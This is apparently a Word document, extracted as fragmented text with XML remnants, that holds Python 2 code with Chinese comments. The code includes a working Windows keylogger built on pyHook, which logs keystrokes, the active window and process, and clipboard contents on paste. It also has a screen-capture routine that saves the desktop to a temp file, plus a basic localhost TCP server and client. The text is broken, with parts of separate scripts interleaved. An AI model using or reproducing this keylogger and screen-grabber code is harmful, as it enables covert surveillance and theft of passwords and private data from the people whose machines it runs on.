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 ctypes import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import pythoncom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import pyHook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import win32clipboard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user32 = windll.user32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kernel32 = windll.kernel32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psapi = windll.psapi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current_window =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 get_current_process():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获取最上层的窗口句柄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hwnd = user32.GetForegroundWindow()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获取进程ID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pid = c_ulong(0)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user32.GetWindowThreadProcessId(hwnd,byref(pid))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将进程ID存入变量中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process_id = "%d" % pid.value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申请内存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executable = create_string_buffer("\x00"*512)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h_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)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psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)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读取窗口标题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windows_title = create_string_buffer("\x00"*512)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length = user32.GetWindowTextA(hwnd,byref(windows_title),512)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打印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 "[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)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关闭handles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kernel32.CloseHandle(hwnd)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kernel32.CloseHandle(h_process)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定义击键监听事件函数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 KeyStroke(event):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global current_window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检测目标窗口是否转移(换了其他窗口就监听新的窗口)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event.WindowName != current_window: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current_window = event.WindowName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函数调用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get_current_process()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检测击键是否常规按键（非组合键等）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event.Ascii &gt; 32 and event.Ascii &lt;127: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 chr(event.Ascii),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如果发现Ctrl+v（粘贴）事件，就把粘贴板内容记录下来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event.Key == "V":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win32clipboard.OpenClipboard()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pasted_value = win32clipboard.GetClipboardData()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win32clipboard.CloseClipboard()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 "[PASTE]-%s" % (pasted_value),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 "[%s]" % event.Key,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循环监听下一个击键事件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创建并注册hook管理器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kl = pyHook.HookManager()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kl.KeyDown = KeyStroke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注册hook并执行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kl.HookKeyboard()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pythoncom.PumpMessages()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分辨率适应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 = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)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 = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)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 = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)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 = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)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创建设备描述表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desktop_dc = win32gui.GetWindowDC(hdesktop)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img_dc = win32ui.CreateDCFromHandle(desktop_dc)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创建一个内存设备描述表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mem_dc = img_dc.CreateCompatibleDC()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创建位图对象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screenshot = win32ui.CreateBitmap()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screenshot.CreateCompatibleBitmap(img_dc, width, height)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mem_dc.SelectObject(screenshot)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截图至内存设备描述表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mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)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将截图保存到文件中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screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')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内存释放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mem_dc.DeleteDC()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-*- coding: utf-8 -*-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import socket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import threading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监听的IP及端口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bind_ip = "127.0.0.1"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bind_port = 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server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)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server.bind((bind_ip,bind_port))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server.listen(5)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 "[*] Listening on %s:%d" % (bind_ip,bind_port)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 handle_client(client_socket):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 = client_socket.recv(1024)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 "[*] Received:%s" %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client_socket.send("ok!")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client_socket.close()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 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client,addr = server.accept()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 "[*] Accept connection from:%s:%d" % (addr[0],addr[1])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client_handler = threading.Thread(target=handle_client,args=(client,))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client_handler.start()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win32gui.DeleteObject(screenshot.GetHandle())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-*- coding: utf-8 -*-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import socket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目标地址IP/URL及端口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target_host = "127.0.0.1"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target_port = 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创建一个socket对象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 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)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连接主机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client.connect((target_host,target_port))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发送数据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client.send("GET / HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")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# 接收响应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response = client.recv(4096)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3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print response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="5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9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2020-05-15T01:49:55Z</dcterms:created>
  <dc:creator>lenovo</dc:creator>
  <cp:lastModifiedBy>不羁</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-15T01:50:40Z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